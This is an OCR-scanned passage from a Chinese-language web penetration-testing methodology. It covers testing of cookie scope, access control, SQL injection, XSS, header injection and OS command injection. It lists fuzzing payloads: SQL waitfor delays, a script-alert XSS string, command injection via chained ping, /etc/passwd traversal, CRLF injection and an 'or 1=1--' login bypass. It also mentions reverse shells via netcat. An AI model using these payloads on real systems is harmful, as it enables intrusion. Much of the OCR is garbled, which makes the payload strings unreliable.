使 用 JavaScript 在 页 面 加 载 时 自动 提交 该 表单 。 登录 应 用 程序 后 , 使 用 同一 个 浏览 费 加 载 前 面 创建 
的 HTML 页 面 。 确 认 应 用 程序 是 否 执行 想 要 的 操作 。 

(4) 如 果 应 用 程序 为 阻止 CSRF 攻 击 ， 在 请 求 中 使 用 其 他 令 牌 ， 则 应 以 与 测试 会 话 令 牌 相同 的 
方式 测试 这 些 令 牌 的 可 靠 性 。 还 应 测试 应 用 程序 是 否 易 于 受到 UI 伪装 攻击 ， 以 突破 反 CSRF 防 御 
(请 参阅 第 13 草 了 解 相 关 详 情 )。 










































































21.5.10 检查 cookie 范 围 


(1) 如 果 应 用 程序 使 用 HTTP cookie 传 送 会 话 令 脾 (或 任何 其 他 敏感 数据 )， 那 么 检查 相关 的 
Set-Cookie 消 息 头 ， 寻 找 用 于 控制 cookie 范 围 的 所 有 “ 域 ” 或 “路 径 ” 属 性 。 
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(2) 如 采 一 个 应 用 程序 明确 放宽 它 的 cookie 范 围 限制 ， 将 其 设 定 为 一 个 父 域 或 父 目 录 ， 那 么 
攻击 者 可 以 通过 以 上 父 域 或 父 目 录 中 的 其 他 Web 应 用 程序 回 该 应 用 程序 发 动 攻击 。 

(3) 如 果 一 个 应 用 程序 以 它 自 己 的 域名 为 它 的 cookie 域 范围 (或 并 未 指定 “ 域 ” 属 性 )， 那 么 
它 仍 然 可 能 受到 在 子 域 上 运行 的 应 用 程序 的 威胁 。 这 是 设 定 cookie 范 围 造 成 的 后 采 ， 只 有 不 在 安 
全 敏感 的 应 用 程序 的 子 域 上 运行 其 他 应 用 程序 ， 才 能 避免 这 种 后 末 。 

(4) 确定 对 按 路 径 〈 如 /sitemain 和 /site/demo ) 隔离 的 任何 依赖 情况 ， 跨 站 点 脚本 攻击 能 够 破 
坏 这 种 隅 离 。 

(5) 确定 所 有 可 能 收 到 应 用 程序 发 布 的 cookie 的 域名 和 路 径 。 确 定 是 否 可 通过 这 些 域名 或 路 
径 访问 其 他 Web 应 用 程序 ， 以 及 是 否 可 利用 它们 获得 发 布 给 目标 应 用 程序 用 户 的 cookie。 


21.6 ”测试 访问 控件 





























21.6.1 了 解 访问 控制 要 求 


YW yy 


21.6.2 使 用 多 个 账 21.6.3 使 用 有 限 的 
户 测试 权限 测试 





图 21-7 ”测试 访问 控制 
21.6.1 了 解 访问 控制 要 求 


(根据 应 用 程序 的 核心 功能 ， 了 解 访 问 控制 在 垂直 隔离 ( 拥有 不 同 权限 的 用 户 可 访问 不 同 
类 型 的 功能 ) 与 水 平 隔离 ( 拥有 相同 权限 的 用 户 可 访问 不 同 的 数据 ) 方面 的 主要 要 求 ， 通 常 ， 应 
用 程序 会 使 用 两 种 权限 隔离 , 例如 ,普通 用 户 能 够 访问 自己 的 数据 ,而 管理 员 则 能 够 访问 每 个 人 
的 数据 。 
(2) 检查 应 用 程序 解析 过 程 得 到 的 结果 ， 确 定 最 可 能 成 为 权限 提升 攻击 目标 的 功能 区 域 与 数 
据 资源 类 型 。 
(3) 为 提高 测试 访问 控制 漏洞 的 效率 ,渗透 测试 员 应 该 获得 大 量 拥有 不 同 垂直 权限 与 水 平权 
限 的 账户 。 如 果 应 用 程序 允许 自我 注册 ， 渗 透 测试 员 就 可 以 直接 获得 大 量 拥有 不 同 水 平权 限 的 
账户 。 为 获得 拥有 不 同 垂直 权限 的 账户 ,需要 得 到 应 用 程序 所 有 者 的 帮助 (或 利用 某 个 漏洞 访 21 
问 一 个 高 权限 账户 )。 如 后 文 所 述 ， 能 否 获得 各 种 不 同 的 账户 将 会 对 能 够 进行 的 测试 产生 直接 


影 啊 。 
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21.6.2 ”使 用 多 个 账户 测试 


(1) 如 果 应 用 程序 实施 垂直 权限 隔离 ， 那 么 首先 使 用 一 个 高 权限 账户 确定 它 能 访问 的 所 有 功 
能 ， 然 后 再 使 用 一 个 低 权 限 账 户 尝试 访问 上 述 每 一 项 功能 。 
(a) 使 用 Burp 在 一 个 用 户 的 权限 下 浏览 应 用 程序 的 所 有 内 容 。 
(b) 复查 Burp 的 站 点 地 图 内 容 ， 确 保 已 确定 要 测试 的 所 有 功能 。 然 后 ， 注 销 应 用 程序 并 使 
用 另 一 个 用 户 账户 登录 ; 使 用 上 下 文采 单 选择 “比较 站 点 地 图 ”( compare site maps ) 
功能 ， 确 定 较 低 权 限 的 用 户 可 以 访问 哪些 高 权限 请 求 。 请 参阅 第 8 章 了 解 这 种 技巧 的 
更 多 详情 。 

(2) 如 果 应 用 程序 实施 水 平权 限 隔离 ， 那 么 使 用 两 个 拥有 相同 权限 的 不 同 账户 进行 同等 测 
试 ， 尝 试 使 用 一 个 账户 访问 属于 另 一 个 账户 的 数据 。 通 常 ， 这 需要 替换 请 求 中 的 一 个 标识 符 〈 如 
一 个 文档 ID )， 以 指定 属于 其 他 用 户 的 资源 。 

(3) 手动 检查 关键 访问 控制 逻辑 。 

对 于 每 个 用 户 权 限 , 复查 用 户 可 用 的 资源 。 尝 试 通过 使 用 未 授权 用 户 的 会 话 令 和 有 牌 从 末 授 权 
用 户 账 户 重新 提交 请 求 来 访问 这 些 资源 。 

(4) 进行 访问 控制 测试 时 ， 一定 要 分 别 测试 多 阶段 功能 的 每 一 个 步 妊 ,确定 每 一 个 阶段 是 否 
正确 实施 了 访问 控制 ; 或 者 应 用 程序 是 否认 为 访问 后 一 个 阶段 的 用 户 一 定 通 过 了 前 面 阶段 实施 的 
安全 检查 。 例 如 ， 如 果 一 个 包含 表单 的 管理 页 面 受 到 恰当 你 扩 , 检查 提交 表单 的 过 程 中 是 否 同样 
实施 了 合理 的 访问 控制 。 




































































21.6.3 ”使 用 有 限 的 权限 测试 


(1) 如 果 不 能 优先 访问 不 同 权限 的 账户 ， 或 者 优先 访问 儿 个 能 够 访问 不 同 数据 的 账户 ， 那 么 
测试 不 完善 的 访问 控制 机 制 可 能 相当 困难 。 由 于 并 不 知 着 利用 各 种 缺陷 所 需 的 URL 和 名 称 、 标 识 符 
和 人 参数， 因此 许多 常见 的 漏洞 将 更 加 难以 确定 。 

(2) 在 使 用 低 权 限 账户 解析 应 用 程序 的 过 程 中 ,渗透 测试 员 可 能 已 经 确定 了 访问 管理 接口 等 
特权 功能 的 URL。 如 果 这 些 功能 没有 得 到 充分 保 扩 ， 渗 透 测试 员 可 能 已 经 了 解 了 这 一 点 。 

(G3) 反 编 译 现 有 的 所 有 已 编译 客户 端 ， 并 提取 对 服务 顺 端 功能 的 任何 引用 情况 。 

(4) 大 多 数 受 到 水 平 访问 控制 保护 的 数据 可 使 用 一 个 标识 符 ( 如 一 个 账号 或 订单 号 ) 访问 。 为 
了 使 用 一 个 账户 测试 访问 控制 是 否 有 效 ,需要 尝试 、 猿 测 或 发 现 与 其 他 用 户 的 数据 有 关 的 标识 符 。 
如 有 可 能 ， 生 成 一 系列 紧密 相连 的 标识 符 ( 例如， 通过 建立 几 个 新 订单 )， 尝 试 确定 所 有 可 帮助 
预测 发 布 给 其 他 用 户 的 标识 符 的 模式 。 如 果 无 法 生成 新 的 标识 符 , 就 只 能 分 析 已 经 确定 的 标识 符 ， 
并 根据 这 些 标识 符 猜 测 其 他 标识 符 。 

(5) 如 采 能 够 预测 出 发 布 给 其 他 用 户 的 标识 从， 使 用 第 14 章 描述 的 技巧 实施 目 动 攻击 ， 获 取 
属于 其 他 用 户 的 有 用 数据 。 可 使 用 Burp Intruder 的 Extract Grep 功 能 从 应 用 程序 的 响应 中 截获 相关 
上 二 | 
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21.6.4 测试 不 安全 的 访问 控制 方法 


(1) 一 些 应 用 程序 根据 请 求 参 数 以 一 种 内 在 不 安全 的 方式 实施 访问 控制 。 在 所 有 关键 请 求 中 
寻找 edit=false 或 access=read 之 类 的 参数 , 根据 它们 的 主要 作用 修改 这 些 参 数 ， 尝试 破 坏 应 
用 程序 的 访问 控制 逻辑 。 

(2) 一 些 应 用 程序 根据 HTTP Referez 消 息 头 做 出 访问 控制 决策 。 例 如 ， 一 个 应 用 程序 可 能 对 
/admin.jsp 实 施 严 格 的 访问 控制 ， 并 接受 在 Referer 中 显示 它 的 所 有 请 求 。 为 测试 这 种 行为 ， 尝 
试 执行 一 些 获得 授权 的 特权 操作 , 并 提交 一 个 其 中 缺少 Referezr 消 息 头 或 Referer 消 息 头 被 修改 
的 请 求 。 如 果 这 种 改变 导致 应 用 程序 阻止 请 求 ， 应 用 程序 很 可 能 以 不 安全 的 方式 使 用 Referer 
消息 头 。 符 试 使 用 一 个 未 通过 验证 的 用 户 账 户 执行 相同 的 操作 ， 但 提交 原始 的 Referez 消 息 头 ， 
看 这 时 是 否 能 够 成 功 执行 操作 。 

(3) 如 果 站 点 允许 HEAD 方 法 ， 则 应 测试 针对 URL 的 不 安全 的 容 絮 托管 访问 控制 。 使 用 HEAD 方 
法 提出 请 求 ， 确 定 应 用 程序 是 否 允 许 该 方法 。 


21.7 ”测试 基于 输入 的 漏洞 


许多 重要 的 漏洞 由 无 法 预测 的 用 户 输入 触发 , 并 可 能 出 现在 应 用 程序 的 任何 位 置 。 用 一 组 攻 
击 学 符 串 模糊 测试 每 个 请 求 的 每 一 个 参数 ， 是 在 应 用 程序 中 探查 这 种 漏洞 的 有 效 方法 。 






























































21.7.4 OS 命 
令 注 入 





图 21-8 测试 基于 输入 的 漏洞 
21.7.1 模糊 测试 所 有 请 求 参数 


(1) 检查 应 用 程序 解析 过 程 中 获得 的 结果 ,确定 所 有 提交 由 服务 需 端 应 用 程序 处 理 的 参数 的 
特 丈 客户 端 请 求 。 相 关 参 数 分 别 位 于 URI 查询 字 符 串 、 请 求 主 体 及 HTTP cookie 中 。 它 们 还 包括 
所 有 给 应 用 程序 行为 造成 影响 的 用 户 提交 的 数据 ， 如 Referez 或 User-Agent 消 息 头 。 

(2) 要 对 这 些 参数 进行 模糊 测试 ， 可 以 使 用 自己 的 脚本 ,或 者 现成 的 模糊 测试 工具 。 例 如 ， 如 
果 使 用 Burp Intruder, 可 轮流 在 工具 中 加 载 每 一 个 请 求 。 一 个 简单 的 方法 是 在 Burp Proxy 中 拦截 一 
个 请 求 ， 然 后 选择 “发 送 至 Intruder” 操 作 ; 或 者 在 Burp Proxy 历 史记 录 中 单 击 一 个 请 求 ， 青 选择 
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这 个 选项 。 使 用 这 个 选项 将 在 Burp Intruder 中 配置 请 求 的 内 容 、 正 确 的 目标 主机 和 端口 , 然后 Burp 
Intruder 自 动 将 所 有 请 求 参 数 的 值 标记 为 有 效 载 集 位 置 ， 准 备 进行 模糊 测试 。 

(3) 使 用 “有 效 载 人 荷 ” 选 项 卡 ， 配 置 一 组 适当 的 攻击 有 将 载 傈 ， 在 应 用 程序 中 探查 漏洞 。 可 以 
手动 输入 有 效 载 条， Sale 它们 ,或 者 选择 一 个 预先 设 定 的 有 效 载 和合 列表 。 模 糊 测 试 
应 用 程序 中 的 第 一 个 请 求 参 数 往往 需要 发 布 数 日 庞大 的 请 求 ,并 在 结果 中 查找 反常 现象 。 如 果 设 
a 这 样 反 而 达 不 到 预期 的 目标 ， 甚 至 生成 无 数 的 输入 ， 以 致 很 难 对 其 进行 分 
析 。 因 此 ， 较 为 明智 的 做 法 是 , 测试 一 系列 可 在 特定 的 专门 设计 的 输入 的 反常 啊 应 中 轻易 确定 的 
第 见 漏洞 ,以 及 出 现在 应 用 程序 的 所 有 位 置 而 非 菜 些 特殊 功能 中 的 漏洞 。 可 以 使 用 以 下 一 组 有 效 
和 形 衙 测试 一 些 常 见 的 漏洞 。 

@ SQLI] | 









































0 
1; waitfor delay :0:30:05:-- 


® XSSDUUDUUD 


xSStest 


"><Sscript>alert{('xss'}</script> 


®e OSUUUDUD 


I Bing =L 30 127 ,0.01 YY ||| Ping -=m ?0 127.0.0.1.& 
| Bin =1 3 7 
| ping -mn 30 127. 
& Ping -1 30 127. 
& Ping -mn30 127. 
; Ping 127.0.0.1 ， 

SO0a ping -1 30 127.0.0.1 %0a 
~ ping 127.0.0.1 . 


| 
] 
:和 家 








YY 
OO OO OO OO 





eD0DUU 
A /etc/passwa 
并 
本 
NA Poot.1ini 


©e [DDD 

;echo 111111 

echo 111111 
response.write 111111 
:response.write 111111 


e0DUUD 


http://<your server name>/ 
http://<nonexistent IP address>/ 


(4) 前 面 所 有 的 有 效 载 集 均 以 字面 量 形式 显示 ，?、; 、&、+ 空格 与 = 了 
有 特殊 含义 ， 需 要 进行 URL 编 码 。 默 认 情 况 下 ，Burp Intruder 会 对 这 些 字符 进行 必要 的 编码 ， 因 
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此 ,必须 确保 该 选项 没有 被 禁用 。( 如 末 想 要 在 定制 后 将 所 有 选项 恢复 到 它们 的 于 认 值 ,可 从 Burp 
沫 单 中 选择 “恢复 默认 值 ”选项 。) 

(5) 在 Burp Intruder 的 Grep 功 能 中 ,配置 一 组 合适 的 字符 串 ， 标 记 啊 应 中 的 一 些 和 常见 的 错误 消 
上 县。 例如 : 


error 
exception 
illegal 
invalid 
fail 
stack 
ACCESS 
directory 
file 

not found 
varchar 
ODBC 

SOQL 

SELECT 
111111 


请 注意 ， 其 中 的 字符 串 111111 用 于 测试 成 功 的 脚本 注入 攻击 ; 21.7.1 闻 第 3 步 中 的 有 将 载 谷 
要 求 将 这 个 值 写 入 服务 硕 的 啊 应 中 。 

(6) 同时 ， 选 择 “ 有 效 载 傈 Grep” 选 项 ， 标 记 包 含有 效 载 售 上 自身 的 啊 应 ， 该 啊 应 表示 可 能 存 
在 XSS 或 消息 头 注 和 人 漏洞 。 

(7) 在 通过 第 一 个 文件 包含 有 效 载 谷 指 定 的 主机 上 建立 一 个 Web 服 务 需 或 netcat 监 听 需 ， 监 控 
服务 器 由 于 远程 文件 包含 攻击 而 发 出 的 连接 尝试 。 

(8) 实施 并 完成 攻击 后 ， 在 结 采 中 查找 表示 存在 汤 洞 的 反常 啊 应 。 检 查 HTTP 状 态 公 、 啊 应 长 
度 、 啊 应 时 间 、 其 中 是 否 出 现 配 置 的 表达 式 以 及 是 否 出 现 有 效 载 何 本 时 。 可 以 单 击 结 果 表 的 每 一 
个 列 标题 ， 对 列 中 的 值 进 行 分 类 〈 按 下 Shift 键 的 同时 单 击 鼠标 可 对 结果 进行 反 回 排序 )， 这 样 做 
可 迅速 确定 所 有 不 同 于 其 他 结果 的 反 篆 啊 应 。 

(9) 参考 本 章 后 文 对 每 一 类 问题 的 详细 描述 ， 对 模糊 测试 结果 表明 可 能 存在 的 每 一 个 潜在 的 
漏洞 进行 确认 ， 同 时 考虑 如 何 成 功 地 利用 这 些 漏洞 。 

(10) 一 旦 配置 Burp Intruder 对 某 个 请 求 进行 模糊 测试 后 ， 束 可 以 迅速 地 对 应 用 程序 中 的 其 他 
请 求 进行 相同 的 测试 。 在 Burp Proxy 中 选 定 目标 请 求 ， 再 选择 “发 送 至 Intruder” 选 项 ， 就 可 以 立 
即使 用 现 有 的 测试 选项 在 Intruder 中 进行 测试 。 这 样 ， 就 可 以 同时 在 单独 的 窗口 中 进行 大 量 测试 ， 
在 测试 完成 后 手动 检查 测试 结 

(11) 如 有 果 在 解析 应 用 程序 的 过 程 中 确定 了 向 外 输入 通道 ,可 通过 它们 癌 应 用 程序 提交 用 户 可 
控制 的 输入 。 滩 透 测试 员 应 当 通 过 提交 各 种 旨 在 触发 常见 的 Web 应 用 程序 漏洞 的 专门 设计 的 数 
据 ， 对 这 些 输入 通道 进行 类 似 的 模糊 漏洞 。 根 据 输 入 通道 的 特点 ， 可 能 需要 建立 一 个 定制 脚本 或 
其 他 工具 。 

(12) 除了 手动 对 应 用 程序 请 求 进行 模糊 测试 外 ， 如 果 拥 有 一 个 目 动 化 Web 应 用 程序 漏洞 扫描 
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售 ， 还 应 当 运 行 该 扫 拉 各， 对 目标 应 用 程序 进行 目 动 测 试 ， 并 比较 两 方面 的 测试 结 
21.7.2 测试 SQL 注入 


(1) 如 果 发 现 21.7.1 市 第 3 步 中 列 出 的 SQL 攻 击 字 符 串 导致 任何 反常 响应 ,那么 应 该 手动 探查 ， 
观察 应 用 程序 如 何人 处 理 相关 参数 ， 确 定 其 中 是 否 存 在 SQL 注 入 漏洞 。 

(2) 如 条 提交 上 述 字 符 串 返回 错误 消息 ,分析 这 些 消息 的 意义 。 可 以 根据 9.2.13 攻 提供 的 信息 
了 解 错 误 消 息 在 背 用 数据 库 平 全 中 的 含义 。 

(3) 如 采 在 请 求 中 提交 一 个 单 引 号 导致 错误 或 出 现 其 他 反常 行为 ， 可 尝试 提交 两 个 单 引 号 ; 
如 采 这 种 输入 使 错误 或 异常 行为 消失 ， 应 用 程序 可 能 易于 受到 SQL 注 入 。 

(4) 设法 使 用 常用 的 SQL 字 人 符 串 连 接 符 函数 构建 一 个 等 同 于 展 性 输入 的 字符 串 。 如 果 提 交 这 
个 字符 串 得 到 与 提交 原始 的 恨 性 输入 相同 的 啊 应 ,那么 应 用 程序 可 能 易于 受到 攻击 。 例 如 ， 如 采 
原始 输入 为 表达 式 Foo， 可 以 使 用 下 面 的 输入 测试 : 

| | soc 

:OO 

! !FOO (注意 ， 引 号 之 间 有 空格 ) 

同样 ， 应 对 在 HTTP 请 求 中 具有 特殊 意义 的 字符 ( 如 + 和 空格 ) 进行 URL 编 码 。 

(5) 如 条 原始 输入 为 数字 字符 ， 和 试 使 用 一 个 其 结 采 等 于 原始 值 的 数学 表达 式 。 例 如 ， 如 末 
原始 信 为 2， 答 试 提 交 1+1 或 3-1。 如 采 应 用 程序 做 出 相同 的 啊 应 ， 表 示 它 兄 于 受到 攻击 ; 如 果 数 
字 表 达 式 的 值 对 应 用 程序 的 行为 造成 系统 性 的 影响 ， 那 么 应 用 程序 就 特别 容易 受到 攻击 。 

(6) 如 有 果 前 面 的 测试 取得 成 功 ， 可 以 通过 使 用 针对 SQL 的 数学 表达 式 构造 一 个 特殊 的 值 ， 进 一 
步 硝 定 SQL 注 入 漏洞 是 否 存在 。 如 采 可 以 通过 这 种 方式 系统 性 地 控制 应 用 程序 的 逻辑 ,那么 几乎 
可 以 肯定 应 用 程序 易于 受到 SQL 注 入 攻击 。 例 如 ， 下 面 两 个 表达 式 的 结果 都 等 于 2: 


67-ASCIT('A', 
51-ASCIIT(1) 


(7) 如 果 使 用 waitfor 命 令 进 行 的 模糊 漏洞 测试 导致 应 用 程序 在 进行 响应 时 出 现 反常 的 时 间 
延迟 ， 那 么 所 使 用 的 数据 库 为 MS-SQL， 且 应 用 程序 易于 受到 SQL 注 和 攻击。 手动 重复 测试 ， 在 
waitfor 参 数 中 指定 不 同 的 值 , 确定 啊 应 时 间 是 否 随 着 这 个 值 而 发 生 系统 性 的 变化 。 请 注意 ,可 
以 在 几 个 SQL 查询 中 插入 攻击 有 效 载荷 ;这 时 观察 到 的 时 间 延 迟 为 指定 值 的 固定 倍数 。 

(8) 如 果 应 用 程序 易于 受到 SQL 注入 攻击 ， 渗 透 测试 员 要 考虑 可 以 实施 哪些 攻击 ， 以 及 如 何 
利用 它们 实现 自己 的 目的 。 请 参考 第 9 章 了 解 实施 以 下 攻击 的 详细 步骤 。 

口 修改 WHERE 子 句 中 的 条 件 ， 改 变 应 用 程序 的 逻辑 (例如 ,注入 or 1=1-- 避 开 登录 )。 

口 使 用 UNION 操 作 符 注 入 任意 一 个 SELECT 查询 ,将 它 的 结果 与 应 用 程序 的 原始 查询 的 结 
果 组 合 在 一 起 。 

口 使 用 针对 数据 库 的 SQL 语 法 “指纹 标识 ”数据 库 类 型 。 

口 如 果 使 用 的 数据 库 为 MS-SQL， 且 应 用 程序 在 啊 应 中 返回 ODBC 错 误 消 息 ， 利 用 这 些 
言 息 枚 举 数 据 库 结构 ， 获 取 任 意 数 据 。 































































































21.7 测试 基于 输入 的 漏洞 609 


口 如 果 无 法 获得 一 个 任意 输入 的 查询 的 结果 ， 可 以 使 用 以 下 攻击 技巧 提取 数据 。 
@ 锋 取 数字 格式 的 字符 串 数据 ， 一 次 一 个 字 市 。 
@ 使 用 市 外 通道 。 
@ 如 采 能 够 根据 任意 一 个 条 件 引 发 不 同 的 应 用 程序 啊 应 ， 可 使 用 Absinthe 提 取 任 意 数 
据 ， 一 次 一 比特 。 
@ 如 采 能 够 根据 一 个 任意 的 条 件 触发 时 间 延 久 ， 利 用 它们 获取 数据 ， 一 次 一 比特 。 
口 如 于 应 用 程序 阻止 实施 特殊 攻击 所 需 的 某 些 字符 或 表达 式 ， 和 尝试 使 用 第 9 章 摘 述 的 各 
种 拉 巧 避 开 输入 过 滤 。 
D 如 有 可 能 , 利用 源 洞 或 强大 的 数据 库 函 数 , 将 攻击 范围 扩大 到 数据 库 与 基础 服务 右 中 。 




















21.7.3 测试 XSS 和 其 他 啊 应 注入 


1. 确定 反射 型 请 求 参 数 

(1) 单 击 “ 有 效 载 和 傈 Grep” 列 ， 分 类 模糊 漏洞 测试 的 结果 ， 确 定 任何 与 21.7.1 节 第 3 步 中 列 出 
的 XSS 有 将 载 傈 相 匹配 的 字符 串 。 这 些 是 在 应 用 程序 啊 应 中 按 原样 返回 的 XSS 测 试 字符 串 。 

(2) 对 于 上 述 每 一 个 字符 串 ， 检查 应 用 程序 的 啊 应 ， 查 找 用 户 提 交 的 输入 的 位 置 。 如 有 果 该 字符 
串 出 现在 啊 应 主体 中 ， 应 测试 应 用 程序 中 是 否 存 在 XSS 漏 洞 。 如 果 它 出 现在 HITP 消 息 头 中 ， 应 
测试 应 用 程序 中 是 否 存 在 消息 头 注入 漏洞 。 如 果 它 被 用 在 302 啊 应 的 Location 消 息 头 中 , 或 者 用 
于 以 某 种 方式 指定 重 定 回 ,应 测试 应 用 程序 中 是 否 存 在 重 定 回 漏 洞 。 请 注意 ， 同 一 个 输入 可 能 会 
被 复制 到 啊 应 中 的 几 个 位 置 ， 因 此 应 用 程序 中 可 能 存在 几 种 类 型 的 反射 型 漏洞 。 

2. 测试 反射 型 XSS 

(1) 对 于 在 啊 应 主体 中 出 现 的 所 有 请 求 参数 ， 检 查 它 周围 的 HTML 代码， 确定 是 否 可 以 提交 
专门 设计 的 输入 ， 从 而 执行 任意 JavaScript 脚 本 。 例 如， 通过 注入 <script> 标 签 ， 注 入 一 段 现 有 
代码 ， 或 在 一 个 标签 属性 中 插入 精心 设计 的 值 ， 执 行 任意 JavaScript 肢 本。 

(2) 将 第 12 划 讲述 的 攻破 签名 过 滤器 的 各 种 方法 作为 参考 ， 了 解 如 何 利用 专门 设计 的 输入 执 
行 任意 JavaScript 肢 本。 

(3) 笠 试 回应 用 程序 提交 各 种 可 能 的 输入 ， 监 控 它 的 啊 应 ,确定 应 用 程序 是 否 对 输入 进行 任 
何 过 小 或 净化 。 如 采 攻 击 字 符 串 被 原样 返回 , 使 用 浏览 器 确 认 成 功 执行 了 任意 JavaScript 脚 本 ( 例 
如 ， 通 过 生成 一 个 警报 对 话 框 )。 

(4) 如 果 发 现 应 用 程序 阻止 需要 使 用 的 某 些 字 符 串 或 表达 式 ， 或 者 对 某 些 字符 进行 URL 编 
码 ， 和 尝试 使 用 第 12 鞋 描述 的 各 种 技巧 避 开 过 滤 。 

(5) 如 果 在 一 个 PosT 请 求 中 发 现 了 XSS 漏 洞 ， 仍然 可 以 通过 一 个 包含 表单 的 恶意 Web 站 点 ， 
由 必要 的 请 求 参 数 和 一 段 脚 本 上 自动 提交 该 表单 ， 对 这 个 漏洞 加 以 利用 。 但 是 ， 如 果 可 以 通过 GET 
请 求 利 用 漏洞 ， 就 可 以 使 用 大 量 的 攻击 传送 机 制 。 尝 试 在 GET 请 求 中 提交 相同 的 参数 ， 看 攻击 是 
否 仍 然 取 得 成 功 。 可 以 使 用 Burp Proxy 的 “改变 请 求 命令 ”( Change Request Method ) 操作 转换 请 
求 类 型 。 
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3. 测试 HTTP 消 息 头 注入 

(1) 对 于 在 啊 应 消息 头 中 出 现 的 每 一 个 请 求 参 数 ， 确 认 应 用 程序 是 否 接受 URL 编 码 的 回 车 
($09 ) 与 换行 ($0a) 符 ， 以 及 它们 是 否 按 原样 在 啊 应 中 返回 。 请 注意 ， 在 服务 带 的 响应 中 寻找 
的 是 换行 符 本 里， 而 不 是 它们 的 URL 编 码 形式 。 

(2) 如 果 在 提 区 专门 设计 的 输入 后 ， 服 务 融 的 啊 应 消息 头 新 增 了 一 行 ， 那 么 应 用 程序 易 受 
HITP 消 息 头 注入 攻击 。 如 第 13 章 所 述 ， 攻 击 者 可 以 利用 这 种 漏洞 实施 各 种 攻击 。 

(3) 如 果 服 务 人 的 啊 应 中 仅 返 回 两 个 换行 符 中 的 一 个 ,根据 实际 情况 ， 仍 可 以 设计 出 有 效 的 
攻击 方法 。 

(4) 如 打发 现 应 用 程序 阻止 包含 换行 符 的 输入 , 或 者 净化 出 现在 响应 中 的 这 些 字符 , 尝试 使 
用 下 面 的 输入 测试 过 小 的 效率 : 

foo%00%0d%s0abar 


foo%250d%250abar 
foo%SSOdOd%SSO0a0abar 


4. 测试 任意 重 定向 

(1) 如 果 反 射 型 输入 用 于 指定 某 类 重 定 辐 的 目标 , 测试 是 否 可 以 提交 专门 设计 的 输入 , 生成 
指向 一 个 外 部 Web 站 点 的 任意 重 定向 。 如 果 可 以 ， 渗透 测试 员 就 可 以 利用 这 种 行为 提高 钓鱼 攻击 
的 可 信 度 。 

(2) 如 果 应 用 程序 以 参数 值 的 形式 传送 绝对 URL， 那 么 修改 URL 中 的 域名 ,测试 应 用 程序 是 
否 重 定 癌 到 不 同 的 域 。 

(3) 如 果 参 数 中 包含 一 个 相对 URL， 将 这 个 URL 修 改 成 指向 另 一 个 域 的 绝对 URL， 并 测试 应 
用 程序 是 否 重 定 问 到 这 个 域 。 

(4) 如 果 应 用 程序 为 防止 外 部 重 定 癌 ， 在 进行 重 定 问 前 对 参数 进行 某 种 形式 的 确认 ， 通 常 仍 
然 可 以 轻易 避 开 这 种 确认 。 尝 试 使 用 第 13 章 描述 的 各 种 攻击 测试 过 滤 的 效率 。 

5. 测试 保存 型 攻击 

(1) 如 果 应 用 程序 保存 用 户 提 交 的 输入 ， 并 随后 在 屏幕 上 显示 这 些 输入 ， 那 么 ， 在 模糊 测试 
整个 应 用 程序 后 ,可 能 会 发 现 攻 击 字 符 串 在 本 二 并 未 包含 这 些 字符 串 的 请 求 的 啊 应 中 人 返回。 留意 
这 种 情况 ， 确 定 被 保存 数据 的 原始 进入 点 。 

(2) 有时， 只 有 完成 一 个 多 阶段 过 程 ， 用 户 提交 的 数据 才 被 成 功 保 存 。 如 果 在 应 用 程序 解析 
过 程 中 确定 这 种 功能 ， 那 么 手动 完成 相关 过 程 ， 并 在 被 保存 的 数据 中 查找 XSS 漏 洞 。 

(3) 如 果 拥 有 足够 的 访问 权限 , 应 仔细 审查 可 在 更 高 权限 的 用 户 会 话 中 显示 低 权 限 用 户 的 数 
气管 理 功能 。 管 理 功 能 中 存在 的 任何 保存 型 XSS 漏 洞 往往 会 直接 导致 权限 提升 。 

(4 测试 用 户 提 交 的 数据 被 保存 且 向 该 用 户 显 示 的 每 一 种 情况 。 测 试 这 些 情况 ， 从 中 查找 上 
述 XSS 和 其 他 吧 应 注入 漏洞 。 

(5) 如 果 发 现 一 个 漏洞 将 一 名 用 户 提 交 的 输入 显示 给 其 他 用 户 ， 渗透 测 试 员 要 确定 可 用 于 实 
现 目标 的 最 佳 攻 击 有 效 载 集 ， 如 会 话 动 持 或 请 求 伪 造 。 如 果 被 保存 的 数据 仪 同 提交 该 数据 的 用 户 
显示 ， 那 么 设法 找 出 办 法 ， 链 接 已 经 发 现 的 所 有 漏洞 〈 如 不 完善 的 访问 控制 )， 从 而 在 其 他 用 户 
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的 会 话 中 注入 一 个 攻击 。 

(6) 如 果 应 用 程序 允许 文件 上 传 与 下 载 ,应 始终 探查 这 种 功能 是 否 易 于 受到 保存 型 XSS 攻 击 。 
如 果 应 用 程序 允许 HTML. JAR 或 文本 文件 , 且 并 不 确认 或 净化 它们 的 内 容 , 那么 几乎 可 以 肯定 它 
们 易于 受到 攻击 。 如 有 果 它 允许 了 PEG 文 件 且 并 不 确认 其 中 是 否 包 含有 歼 的 图 像 ， 那 么 它 可 能 易于 
受到 针对 Internet Explorer 用 户 的 攻击 。 测试 应 用 程序 如 何人 处 理 它 支 持 的 每 种 文件 类 型 , 并 弄 清 浏 
览 右 如 何人 处 理 包 含 HTML 而 非 正 常 内 容 的 响应 。 

(7) 在 一 名 用 户 提 交 的 数据 被 显示 给 其 他 用 户 的 每 一 个 位 置 ， 如 条 应 用 程序 实施 的 过 滤 阻 目 
发 动 保存 型 XSS 攻 击 ， 确 定 应 用 程序 的 行为 是 否 使 它 易 于 受到 本 站 点 请 求 伪 造 攻击 。 






































21.7.4 测试 OS 命令 注入 


(1) 如 果 在 21.7.1 市 第 3 步 中 列 出 的 任何 命令 注入 攻击 字符 串 导 致 应 用 程序 在 做 出 啊 应 时 出 现 
反 生 的 时 间 延 运 ， 那 么 应 用 程序 易于 受到 OS 命令 注入 攻击 。 手 动 重复 进行 测试 ， 在 -i 或 -n 参 数 
中 指定 不 同 的 值 ， 确 定 啊 应 时 间 是 否 随 着 这 个 值 而 发 生 系统 性 的 变化 。 

(2) 使 用 所 发 现 的 任何 一 个 可 成 功 实施 攻击 的 注入 字符 串 ， 尝 试 注 入 男 一 个 更 加 有 用 的 命令 
( 如 1s 或 air )， 确 定 是 否 能 够 将 命令 结果 返回 到 浏览 需 上 。 

(3) 如 果 不 能 直接 获得 命令 执行 结果 ， 还 可 以 采用 其 他 方法 。 

口 可 以 尝试 打开 一 条 通 回 上 自己 计算 机 的 带 外 通道 。 莹 试 使 用 TFTP 上 传 工具 至 服务 需 ， 
使 用 telnet 或 netcat 建 立 一 个 通 癌 目 己 计算 机 的 反问 shell, 并 使 用 mail 命 令 通 过 SMTP 发 


送 命令 结果 。 


